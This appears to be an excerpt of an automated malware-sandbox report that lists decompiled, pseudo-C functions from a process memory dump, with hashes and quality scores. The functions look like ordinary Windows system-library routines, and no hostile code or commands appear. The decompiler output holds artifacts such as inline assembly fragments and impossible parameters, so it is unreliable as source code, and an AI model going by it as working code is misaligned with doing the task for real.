                                                                                          				E01B8D0E8(__ebx, __edi, __esi);
                                                                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                          				if(__edx == 0xffffffff) {
                                                                                          					L6:
                                                                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                          					__eflags = _t65 & 0x00000002;
                                                                                          					if((_t65 & 0x00000002) != 0) {
                                                                                          						L3:
                                                                                          						L4:
                                                                                          						return E01B8D130(_t95, _t108, _t109);
                                                                                          					}
                                                                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                          					_t108 = 0;
                                                                                          					_t109 = 0;
                                                                                          					_t95 = 0;
                                                                                          					__eflags = 0;
                                                                                          					while(1) {
                                                                                          						__eflags = _t95 - 0x200;
                                                                                          						if(_t95 >= 0x200) {
                                                                                          							break;
                                                                                          						}
                                                                                          						E01B7D000(0x80);
                                                                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                          						_t108 = _t115;
                                                                                          						_t95 = _t95 - 0xffffff80;
                                                                                          						_t17 = _t114 - 4;
                                                                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                          						__eflags =  *_t17;
                                                                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                          						_t102 = _t110 + 1;
                                                                                          						do {
                                                                                          							_t85 =  *_t110;
                                                                                          							_t110 = _t110 + 1;
                                                                                          							__eflags = _t85;
                                                                                          						} while (_t85 != 0);
                                                                                          						_t111 = _t110 - _t102;
                                                                                          						_t21 = _t95 - 1; // -129
                                                                                          						_t86 = _t21;
                                                                                          						__eflags = _t111 - _t86;
                                                                                          						if(_t111 > _t86) {
                                                                                          							_t111 = _t86;
                                                                                          						}
                                                                                          						E01B7F3E0(_t108, _t106, _t111);
                                                                                          						_t115 = _t115 + 0xc;
                                                                                          						_t103 = _t111 + _t108;
                                                                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                          						_t89 = _t95 - _t111;
                                                                                          						__eflags = _t89;
                                                                                          						_push(0);
                                                                                          						if(_t89 == 0) {
                                                                                          							L15:
                                                                                          							_t109 = 0xc000000d;
                                                                                          							goto L16;
                                                                                          						} else {
                                                                                          							__eflags = _t89 - 0x7fffffff;
                                                                                          							if(_t89 <= 0x7fffffff) {
                                                                                          								L16:
                                                                                          								 *(_t114 - 0x94) = _t109;
                                                                                          								__eflags = _t109;
                                                                                          								if(_t109 < 0) {
                                                                                          									__eflags = _t89;
                                                                                          									if(_t89 != 0) {
                                                                                          										 *_t103 = 0;
                                                                                          									}
                                                                                          									L26:
                                                                                          									 *(_t114 - 0xa0) = _t109;
                                                                                          									 *(_t114 - 4) = 0xfffffffe;
                                                                                          									__eflags = _t109;
                                                                                          									if(_t109 >= 0) {
                                                                                          										L31:
                                                                                          										_t98 = _t108;
                                                                                          										_t39 = _t98 + 1; // 0x1
                                                                                          										_t106 = _t39;
                                                                                          										do {
                                                                                          											_t69 =  *_t98;
                                                                                          											_t98 = _t98 + 1;
                                                                                          											__eflags = _t69;
                                                                                          										} while (_t69 != 0);
                                                                                          										_t99 = _t98 - _t106;
                                                                                          										__eflags = _t99;
                                                                                          										L34:
                                                                                          										_t70 =  *[fs:0x30];
                                                                                          										__eflags =  *((char*)(_t70 + 2));
                                                                                          										if( *((char*)(_t70 + 2)) != 0) {
                                                                                          											L40:
                                                                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                          											 *(_t114 - 4) = 1;
                                                                                          											_push(_t114 - 0x74);
                                                                                          											L01B8DEF0(_t99, _t106);
                                                                                          											 *(_t114 - 4) = 0xfffffffe;
                                                                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                          											goto L3;
                                                                                          										}
                                                                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                          											goto L40;
                                                                                          										}
                                                                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                          										_push(_t99 & 0x0000ffff);
                                                                                          										_push(_t108);
                                                                                          										_push(1);
                                                                                          										_t101 = E01B7B280();
                                                                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                          											__eflags = _t101 - 0x80000003;
                                                                                          											if(_t101 == 0x80000003) {
                                                                                          												E01B7B7E0(1);
                                                                                          												_t101 = 0;
                                                                                          												__eflags = 0;
                                                                                          											}
                                                                                          										}
                                                                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                          										goto L4;
                                                                                          									}
                                                                                          									__eflags = _t109 - 0x80000005;
                                                                                          									if(_t109 == 0x80000005) {
                                                                                          										continue;
                                                                                          									}
                                                                                          									break;
                                                                                          								}
                                                                                          								 *(_t114 - 0x90) = 0;
                                                                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                          								_t91 = E01B7E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                          								_t115 = _t115 + 0x10;
                                                                                          								_t104 = _t91;
                                                                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                          								__eflags = _t104;
                                                                                          								if(_t104 < 0) {
                                                                                          									L21:
                                                                                          									_t109 = 0x80000005;
                                                                                          									 *(_t114 - 0x90) = 0x80000005;
                                                                                          									L22:
                                                                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                          									L23:
                                                                                          									 *(_t114 - 0x94) = _t109;
                                                                                          									goto L26;
                                                                                          								}
                                                                                          								__eflags = _t104 - _t92;
                                                                                          								if(__eflags > 0) {
                                                                                          									goto L21;
                                                                                          								}
                                                                                          								if(__eflags == 0) {
                                                                                          									goto L22;
                                                                                          								}
                                                                                          								goto L23;
                                                                                          							}
                                                                                          							goto L15;
                                                                                          						}
                                                                                          					}
                                                                                          					__eflags = _t109;
                                                                                          					if(_t109 >= 0) {
                                                                                          						goto L31;
                                                                                          					}
                                                                                          					__eflags = _t109 - 0x80000005;
                                                                                          					if(_t109 != 0x80000005) {
                                                                                          						goto L31;
                                                                                          					}
                                                                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                          					_t38 = _t95 - 1; // -129
                                                                                          					_t99 = _t38;
                                                                                          					goto L34;
                                                                                          				}
                                                                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                          					__eflags = __edx - 0x65;
                                                                                          					if(__edx != 0x65) {
                                                                                          						goto L2;
                                                                                          					}
                                                                                          					goto L6;
                                                                                          				}
                                                                                          				L2:
                                                                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                          				_push(_t106);
                                                                                          				if(E01B7A890() != 0) {
                                                                                          					goto L6;
                                                                                          				}
                                                                                          				goto L3;
                                                                                          			}























                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: _vswprintf_s
                                                                                          • String ID:
                                                                                          • API String ID: 677850445-0
                                                                                          • Opcode ID: e353693e06213c721517d3de4bf70a3e27b7597765c608a7c595fa17abe9b0d6
                                                                                          • Instruction ID: 9f57e773a85675bb3359bac440a5879db6cfc35f9c7671bc41ce48ee5f134791
                                                                                          • Opcode Fuzzy Hash: e353693e06213c721517d3de4bf70a3e27b7597765c608a7c595fa17abe9b0d6
                                                                                          • Instruction Fuzzy Hash: 5351BF71D102598EDF399F688A84BAEBBB0EF05714F1042FDD869AB282D7704947CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 76%
                                                                                          			E01B5B944(signed int* __ecx, char __edx) {
                                                                                          				signed int _v8;
                                                                                          				signed int _v16;
                                                                                          				signed int _v20;
                                                                                          				char _v28;
                                                                                          				signed int _v32;
                                                                                          				char _v36;
                                                                                          				signed int _v40;
                                                                                          				intOrPtr _v44;
                                                                                          				signed int* _v48;
                                                                                          				signed int _v52;
                                                                                          				signed int _v56;
                                                                                          				intOrPtr _v60;
                                                                                          				intOrPtr _v64;
                                                                                          				intOrPtr _v68;
                                                                                          				intOrPtr _v72;
                                                                                          				intOrPtr _v76;
                                                                                          				char _v77;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				intOrPtr* _t65;
                                                                                          				intOrPtr _t67;
                                                                                          				intOrPtr _t68;
                                                                                          				char* _t73;
                                                                                          				intOrPtr _t77;
                                                                                          				intOrPtr _t78;
                                                                                          				signed int _t82;
                                                                                          				intOrPtr _t83;
                                                                                          				void* _t87;
                                                                                          				char _t88;
                                                                                          				intOrPtr* _t89;
                                                                                          				intOrPtr _t91;
                                                                                          				void* _t97;
                                                                                          				intOrPtr _t100;
                                                                                          				void* _t102;
                                                                                          				void* _t107;
                                                                                          				signed int _t108;
                                                                                          				intOrPtr* _t112;
                                                                                          				void* _t113;
                                                                                          				intOrPtr* _t114;
                                                                                          				intOrPtr _t115;
                                                                                          				intOrPtr _t116;
                                                                                          				intOrPtr _t117;
                                                                                          				signed int _t118;
                                                                                          				void* _t130;
                                                                                          
                                                                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                          				_v8 =  *0x1c2d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                          				_t112 = __ecx;
                                                                                          				_v77 = __edx;
                                                                                          				_v48 = __ecx;
                                                                                          				_v28 = 0;
                                                                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                          				_t105 =  *_t5;
                                                                                          				_v20 = 0;
                                                                                          				_v16 = 0;
                                                                                          				if(_t105 == 0) {
                                                                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                          					_t60 =  *__ecx |  *_t50;
                                                                                          					if(( *__ecx |  *_t50) != 0) {
                                                                                          						 *__ecx = 0;
                                                                                          						__ecx[1] = 0;
                                                                                          						if(E01B57D50() != 0) {
                                                                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                          						} else {
                                                                                          							_t65 = 0x7ffe0386;
                                                                                          						}
                                                                                          						if( *_t65 != 0) {
                                                                                          							E01C08CD6(_t112);
                                                                                          						}
                                                                                          						_push(0);
                                                                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                          						_push( *_t52);
                                                                                          						_t60 = E01B79E20();
                                                                                          					}
                                                                                          					L20:
                                                                                          					_pop(_t107);
                                                                                          					_pop(_t113);
                                                                                          					_pop(_t87);
                                                                                          					return E01B7B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                          				}
                                                                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                          				_t67 =  *_t8;
                                                                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                          				_t108 =  *(_t67 + 0x14);
                                                                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                          				_t105 = 0x2710;
                                                                                          				asm("sbb eax, edi");
                                                                                          				_v44 = _t88;
                                                                                          				_v52 = _t108;
                                                                                          				_t60 = E01B7CE00(_t97, _t68, 0x2710, 0);
                                                                                          				_v56 = _t60;
                                                                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                          					L3:
                                                                                          					 *(_t112 + 0x44) = _t60;
                                                                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                          					 *_t112 = _t88;
                                                                                          					 *(_t112 + 4) = _t108;
                                                                                          					_v20 = _t60 * 0x2710;
                                                                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                          					if(_v77 != 0) {
                                                                                          						L16:
                                                                                          						_v36 = _t88;
                                                                                          						_v32 = _t108;
                                                                                          						if(E01B57D50() != 0) {
                                                                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                          						} else {
                                                                                          							_t73 = 0x7ffe0386;
                                                                                          						}
                                                                                          						if( *_t73 != 0) {
                                                                                          							_t105 = _v40;
                                                                                          							E01C08F6A(_t112, _v40, _t88, _t108);
                                                                                          						}
                                                                                          						_push( &_v28);
                                                                                          						_push(0);
                                                                                          						_push( &_v36);
                                                                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                          						_push( *_t48);
                                                                                          						_t60 = E01B7AF60();
                                                                                          						goto L20;
                                                                                          					} else {
                                                                                          						_t89 = 0x7ffe03b0;
                                                                                          						do {
                                                                                          							_t114 = 0x7ffe0010;
                                                                                          							do {
                                                                                          								_t77 =  *0x1c28628; // 0x0
                                                                                          								_v68 = _t77;
                                                                                          								_t78 =  *0x1c2862c; // 0x0
                                                                                          								_v64 = _t78;
                                                                                          								_v72 =  *_t89;
                                                                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                          								while(1) {
                                                                                          									_t105 =  *0x7ffe000c;
                                                                                          									_t100 =  *0x7ffe0008;
                                                                                          									if(_t105 ==  *_t114) {
                                                                                          										goto L8;
                                                                                          									}
                                                                                          									asm("pause");
                                                                                          								}
                                                                                          								L8:
                                                                                          								_t89 = 0x7ffe03b0;
                                                                                          								_t115 =  *0x7ffe03b0;
                                                                                          								_t82 =  *0x7FFE03B4;
                                                                                          								_v60 = _t115;
                                                                                          								_t114 = 0x7ffe0010;
                                                                                          								_v56 = _t82;
                                                                                          							} while (_v72 != _t115 || _v76 != _t82);
                                                                                          							_t83 =  *0x1c28628; // 0x0
                                                                                          							_t116 =  *0x1c2862c; // 0x0
                                                                                          							_v76 = _t116;
                                                                                          							_t117 = _v68;
                                                                                          						} while (_t117 != _t83 || _v64 != _v76);
                                                                                          						asm("sbb edx, [esp+0x24]");
                                                                                          						_t102 = _t100 - _v60 - _t117;
                                                                                          						_t112 = _v48;
                                                                                          						_t91 = _v44;
                                                                                          						asm("sbb edx, eax");
                                                                                          						_t130 = _t105 - _v52;
                                                                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                          							_t88 = _t102 - _t91;
                                                                                          							asm("sbb edx, edi");
                                                                                          							_t108 = _t105;
                                                                                          						} else {
                                                                                          							_t88 = 0;
                                                                                          							_t108 = 0;
                                                                                          						}
                                                                                          						goto L16;
                                                                                          					}
                                                                                          				} else {
                                                                                          					if( *(_t112 + 0x44) == _t60) {
                                                                                          						goto L20;
                                                                                          					}
                                                                                          					goto L3;
                                                                                          				}
                                                                                          			}

















































                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B5B9A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 885266447-0
                                                                                          • Opcode ID: 00562a76051828508a184b060f427cfa1b3214257cd9d72fde7c5aedd15031b6
                                                                                          • Instruction ID: 16e5069dbd26ad1fcf1bfbf5f3cf281e5b24d82c02ccf2c1d72322fbb3b6da2c
                                                                                          • Opcode Fuzzy Hash: 00562a76051828508a184b060f427cfa1b3214257cd9d72fde7c5aedd15031b6
                                                                                          • Instruction Fuzzy Hash: 8C516D71608341CFC769DF28C580A2ABBF6FB88610F5489AEF99587355DB70E844CB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 84%
                                                                                          			E01B62581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912178) {
                                                                                          				signed int _v8;
                                                                                          				signed int _v16;
                                                                                          				unsigned int _v24;
                                                                                          				void* _v28;
                                                                                          				signed int _v32;
                                                                                          				unsigned int _v36;
                                                                                          				void* _v37;
                                                                                          				signed int _v40;
                                                                                          				signed int _v44;
                                                                                          				signed int _v48;
                                                                                          				signed int _v52;
                                                                                          				signed int _v56;
                                                                                          				intOrPtr _v60;
                                                                                          				signed int _v64;
                                                                                          				signed int _v68;
                                                                                          				signed int _v72;
                                                                                          				signed int _v76;
                                                                                          				signed int _v80;
                                                                                          				signed int _t237;
                                                                                          				signed int _t241;
                                                                                          				signed int _t244;
                                                                                          				signed int _t246;
                                                                                          				intOrPtr _t248;
                                                                                          				signed int _t251;
                                                                                          				signed int _t258;
                                                                                          				signed int _t261;
                                                                                          				signed int _t269;
                                                                                          				signed int _t275;
                                                                                          				signed int _t277;
                                                                                          				void* _t279;
                                                                                          				signed int _t280;
                                                                                          				unsigned int _t283;
                                                                                          				signed int _t287;
                                                                                          				signed int _t289;
                                                                                          				signed int _t293;
                                                                                          				intOrPtr _t311;
                                                                                          				signed int _t320;
                                                                                          				signed int _t322;
                                                                                          				signed int _t323;
                                                                                          				signed int _t327;
                                                                                          				signed int _t328;
                                                                                          				void* _t330;
                                                                                          				void* _t331;
                                                                                          				signed int _t332;
                                                                                          				signed int _t334;
                                                                                          				signed int _t336;
                                                                                          				void* _t337;
                                                                                          				void* _t339;
                                                                                          
                                                                                          				_t334 = _t336;
                                                                                          				_t337 = _t336 - 0x4c;
                                                                                          				_v8 =  *0x1c2d360 ^ _t334;
                                                                                          				_push(__ebx);
                                                                                          				_push(__esi);
                                                                                          				_push(__edi);
                                                                                          				_t327 = 0x1c2b2e8;
                                                                                          				_v56 = _a4;
                                                                                          				_v48 = __edx;
                                                                                          				_v60 = __ecx;
                                                                                          				_t283 = 0;
                                                                                          				_v80 = 0;
                                                                                          				asm("movsd");
                                                                                          				_v64 = 0;
                                                                                          				_v76 = 0;
                                                                                          				_v72 = 0;
                                                                                          				asm("movsd");
                                                                                          				_v44 = 0;
                                                                                          				_v52 = 0;
                                                                                          				_v68 = 0;
                                                                                          				asm("movsd");
                                                                                          				_v32 = 0;
                                                                                          				_v36 = 0;
                                                                                          				asm("movsd");
                                                                                          				_v16 = 0;
                                                                                          				_t339 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                          				_t275 = 0x48;
                                                                                          				_t303 = 0 | _t339 == 0x00000000;
                                                                                          				_t320 = 0;
                                                                                          				_v37 = _t339 == 0;
                                                                                          				if(_v48 <= 0) {
                                                                                          					L16:
                                                                                          					_t45 = _t275 - 0x48; // 0x0
                                                                                          					__eflags = _t45 - 0xfffe;
                                                                                          					if(_t45 > 0xfffe) {
                                                                                          						_t328 = 0xc0000106;
                                                                                          						goto L32;
                                                                                          					} else {
                                                                                          						_t327 = L01B54620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                          						_v52 = _t327;
                                                                                          						__eflags = _t327;
                                                                                          						if(_t327 == 0) {
                                                                                          							_t328 = 0xc0000017;
                                                                                          							goto L32;
                                                                                          						} else {
                                                                                          							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
                                                                                          							_t50 = _t327 + 0x48; // 0x48
                                                                                          							_t322 = _t50;
                                                                                          							_t303 = _v32;
                                                                                          							 *(_t327 + 0x3c) = _t275;
                                                                                          							_t277 = 0;
                                                                                          							 *((short*)(_t327 + 0x30)) = _v48;
                                                                                          							__eflags = _t303;
                                                                                          							if(_t303 != 0) {
                                                                                          								 *(_t327 + 0x18) = _t322;
                                                                                          								__eflags = _t303 - 0x1c28478;
                                                                                          								 *_t327 = ((0 | _t303 == 0x01c28478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                          								E01B7F3E0(_t322,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                                                          								_t303 = _v32;
                                                                                          								_t337 = _t337 + 0xc;
                                                                                          								_t277 = 1;
                                                                                          								__eflags = _a8;
                                                                                          								_t322 = _t322 + (( *_t303 & 0x0000ffff) >> 1) * 2;
                                                                                          								if(_a8 != 0) {
                                                                                          									_t269 = E01BC39F2(_t322);
                                                                                          									_t303 = _v32;
                                                                                          									_t322 = _t269;
                                                                                          								}
                                                                                          							}
                                                                                          							_t287 = 0;
                                                                                          							_v16 = 0;
                                                                                          							__eflags = _v48;
                                                                                          							if(_v48 <= 0) {
                                                                                          								L31:
                                                                                          								_t328 = _v68;
                                                                                          								__eflags = 0;
                                                                                          								 *((short*)(_t322 - 2)) = 0;
                                                                                          								goto L32;
                                                                                          							} else {
                                                                                          								_t275 = _t327 + _t277 * 4;
                                                                                          								_v56 = _t275;
                                                                                          								do {
                                                                                          									__eflags = _t303;
                                                                                          									if(_t303 != 0) {
                                                                                          										_t237 =  *(_v60 + _t287 * 4);
                                                                                          										__eflags = _t237;
                                                                                          										if(_t237 == 0) {
                                                                                          											goto L30;
                                                                                          										} else {
                                                                                          											__eflags = _t237 == 5;
                                                                                          											if(_t237 == 5) {
                                                                                          												goto L30;
                                                                                          											} else {
                                                                                          												goto L22;
                                                                                          											}
                                                                                          										}
                                                                                          									} else {
                                                                                          										L22:
                                                                                          										 *_t275 =  *(_v60 + _t287 * 4);
                                                                                          										 *(_t275 + 0x18) = _t322;
                                                                                          										_t241 =  *(_v60 + _t287 * 4);
                                                                                          										__eflags = _t241 - 8;
                                                                                          										if(_t241 > 8) {
                                                                                          											goto L56;
                                                                                          										} else {
                                                                                          											switch( *((intOrPtr*)(_t241 * 4 +  &M01B62959))) {
                                                                                          												case 0:
                                                                                          													__ax =  *0x1c28488;
                                                                                          													__eflags = __ax;
                                                                                          													if(__ax == 0) {
                                                                                          														goto L29;
                                                                                          													} else {
                                                                                          														__ax & 0x0000ffff = E01B7F3E0(__edi,  *0x1c2848c, __ax & 0x0000ffff);
                                                                                          														__eax =  *0x1c28488 & 0x0000ffff;
                                                                                          														goto L26;
                                                                                          													}
                                                                                          													goto L108;
                                                                                          												case 1:
                                                                                          													L45:
                                                                                          													E01B7F3E0(_t322, _v80, _v64);
                                                                                          													_t264 = _v64;
                                                                                          													goto L26;
                                                                                          												case 2:
                                                                                          													 *0x1c28480 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c28484,  *0x1c28480 & 0x0000ffff);
                                                                                          													__eax =  *0x1c28480 & 0x0000ffff;
                                                                                          													__eax = ( *0x1c28480 & 0x0000ffff) >> 1;
                                                                                          													__edi = __edi + __eax * 2;
                                                                                          													goto L28;
                                                                                          												case 3:
                                                                                          													__eax = _v44;
                                                                                          													__eflags = __eax;
                                                                                          													if(__eax == 0) {
                                                                                          														goto L29;
                                                                                          													} else {
                                                                                          														__esi = __eax + __eax;
                                                                                          														__eax = E01B7F3E0(__edi, _v72, __esi);
                                                                                          														__edi = __edi + __esi;
                                                                                          														__esi = _v52;
                                                                                          														goto L27;
                                                                                          													}
                                                                                          													goto L108;
                                                                                          												case 4:
                                                                                          													_push(0x2e);
                                                                                          													_pop(__eax);
                                                                                          													 *(__esi + 0x44) = __edi;
                                                                                          													 *__edi = __ax;
                                                                                          													__edi = __edi + 4;
                                                                                          													_push(0x3b);
                                                                                          													_pop(__eax);
                                                                                          													 *(__edi - 2) = __ax;
                                                                                          													goto L29;
                                                                                          												case 5:
                                                                                          													__eflags = _v36;
                                                                                          													if(_v36 == 0) {
                                                                                          														goto L45;
                                                                                          													} else {
                                                                                          														E01B7F3E0(_t322, _v76, _v36);
                                                                                          														_t264 = _v36;
                                                                                          													}
                                                                                          													L26:
                                                                                          													_t337 = _t337 + 0xc;
                                                                                          													_t322 = _t322 + (_t264 >> 1) * 2 + 2;
                                                                                          													__eflags = _t322;
                                                                                          													L27:
                                                                                          													_push(0x3b);
                                                                                          													_pop(_t266);
                                                                                          													 *((short*)(_t322 - 2)) = _t266;
                                                                                          													goto L28;
                                                                                          												case 6:
                                                                                          													__ebx =  *0x1c2575c;
                                                                                          													__eflags = __ebx - 0x1c2575c;
                                                                                          													if(__ebx != 0x1c2575c) {
                                                                                          														_push(0x3b);
                                                                                          														_pop(__esi);
                                                                                          														do {
                                                                                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                          															E01B7F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                          															__edi = __edi + __eax * 2;
                                                                                          															__edi = __edi + 2;
                                                                                          															 *(__edi - 2) = __si;
                                                                                          															__ebx =  *__ebx;
                                                                                          															__eflags = __ebx - 0x1c2575c;
                                                                                          														} while (__ebx != 0x1c2575c);
                                                                                          														__esi = _v52;
                                                                                          														__ecx = _v16;
                                                                                          														__edx = _v32;
                                                                                          													}
                                                                                          													__ebx = _v56;
                                                                                          													goto L29;
                                                                                          												case 7:
                                                                                          													 *0x1c28478 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c2847c,  *0x1c28478 & 0x0000ffff);
                                                                                          													__eax =  *0x1c28478 & 0x0000ffff;
                                                                                          													__eax = ( *0x1c28478 & 0x0000ffff) >> 1;
                                                                                          													__eflags = _a8;
                                                                                          													__edi = __edi + __eax * 2;
                                                                                          													if(_a8 != 0) {
                                                                                          														__ecx = __edi;
                                                                                          														__eax = E01BC39F2(__ecx);
                                                                                          														__edi = __eax;
                                                                                          													}
                                                                                          													goto L28;
                                                                                          												case 8:
                                                                                          													__eax = 0;
                                                                                          													 *(__edi - 2) = __ax;
                                                                                          													 *0x1c26e58 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c26e5c,  *0x1c26e58 & 0x0000ffff);
                                                                                          													 *(__esi + 0x38) = __edi;
                                                                                          													__eax =  *0x1c26e58 & 0x0000ffff;
                                                                                          													__eax = ( *0x1c26e58 & 0x0000ffff) >> 1;
                                                                                          													__edi = __edi + __eax * 2;
                                                                                          													__edi = __edi + 2;
                                                                                          													L28:
                                                                                          													_t287 = _v16;
                                                                                          													_t303 = _v32;
                                                                                          													L29:
                                                                                          													_t275 = _t275 + 4;
                                                                                          													__eflags = _t275;
                                                                                          													_v56 = _t275;
                                                                                          													goto L30;
                                                                                          											}
                                                                                          										}
                                                                                          									}
                                                                                          									goto L108;
                                                                                          									L30:
                                                                                          									_t287 = _t287 + 1;
                                                                                          									_v16 = _t287;
                                                                                          									__eflags = _t287 - _v48;
                                                                                          								} while (_t287 < _v48);
                                                                                          								goto L31;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				} else {
                                                                                          					while(1) {
                                                                                          						L1:
                                                                                          						_t241 =  *(_v60 + _t320 * 4);
                                                                                          						if(_t241 > 8) {
                                                                                          							break;
                                                                                          						}
                                                                                          						switch( *((intOrPtr*)(_t241 * 4 +  &M01B62935))) {
                                                                                          							case 0:
                                                                                          								__ax =  *0x1c28488;
                                                                                          								__eflags = __ax;
                                                                                          								if(__ax != 0) {
                                                                                          									__eax = __ax & 0x0000ffff;
                                                                                          									__ebx = __ebx + 2;
                                                                                          									__eflags = __ebx;
                                                                                          									goto L53;
                                                                                          								}
                                                                                          								goto L14;
                                                                                          							case 1:
                                                                                          								L44:
                                                                                          								_t303 =  &_v64;
                                                                                          								_v80 = E01B62E3E(0,  &_v64);
                                                                                          								_t275 = _t275 + _v64 + 2;
                                                                                          								goto L13;
                                                                                          							case 2:
                                                                                          								__eax =  *0x1c28480 & 0x0000ffff;
                                                                                          								__ebx = __ebx + __eax;
                                                                                          								__eflags = __dl;
                                                                                          								if(__dl != 0) {
                                                                                          									__eax = 0x1c28480;
                                                                                          									goto L80;
                                                                                          								}
                                                                                          								goto L14;
                                                                                          							case 3:
                                                                                          								__eax = E01B4EEF0(0x1c279a0);
                                                                                          								__eax =  &_v44;
                                                                                          								_push(__eax);
                                                                                          								_push(0);
                                                                                          								_push(0);
                                                                                          								_push(4);
                                                                                          								_push(L"PATH");
                                                                                          								_push(0);
                                                                                          								L57();
                                                                                          								__esi = __eax;
                                                                                          								_v68 = __esi;
                                                                                          								__eflags = __esi - 0xc0000023;
                                                                                          								if(__esi != 0xc0000023) {
                                                                                          									L10:
                                                                                          									__eax = E01B4EB70(__ecx, 0x1c279a0);
                                                                                          									__eflags = __esi - 0xc0000100;
                                                                                          									if(__esi == 0xc0000100) {
                                                                                          										_v44 = _v44 & 0x00000000;
                                                                                          										__eax = 0;
                                                                                          										_v68 = 0;
                                                                                          										goto L13;
                                                                                          									} else {
                                                                                          										__eflags = __esi;
                                                                                          										if(__esi < 0) {
                                                                                          											L32:
